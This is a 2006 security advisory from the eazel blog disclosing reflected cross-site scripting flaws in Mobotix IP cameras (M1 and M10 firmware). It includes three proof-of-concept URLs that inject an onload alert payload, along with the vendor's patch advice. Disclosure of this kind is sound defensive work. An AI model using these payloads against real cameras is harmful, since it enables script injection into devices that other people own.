Buscar
Archivos

Te encuentras en los archivos del blog eazel para el año Miércoles, 17 de Mayo de 2006.

Archivo del 17 de Mayo de 2006

Mobotix IP Network Cameras Multiple XSS

17 de Mayo de 2006 | Autor: admin
Version: Mobotix IP Network Cameras Multiple Cross Site Scripting
Tested on M1 and M10
- M10-V2.0.5.2
- M1-V1.9.4.7
Discovered by: Discovered by: jaime.blasco(at)eazel(dot).es
http://www.eazel.es
Description: Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws.Due to improper filtering a remote attacker can cause a cross site scripting in these scripts:

http://camera/help/help?%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E

http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E&download=egal

http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert(‘www.eazel.es’)%3E
Vendor: MOBOTIX provides new software versions that include a security patch
that prevents cross site scripting flaws.

MOBOTIX encourages customers to upgrade to at least software version
- V2.2.3.18 (for camera models M10/D10) and
- V3.0.3.31 (for camera model M22)
or higher (if available). The software is available for download from
our website www. mobotix .com :
http://www. mobotix .com/service s/software_downloads

keywords: advisory001
Publicado en Security Advisories | Etiquetas: , | No hay comentarios »
Categorías
Bookmarks

Contact Us | Terms of Use | Trademarks | Privacy Statement
Copyright © 2009 eazel. All Rights Reserved.

Powered by WordPress and WordPress Theme created with Artisteer.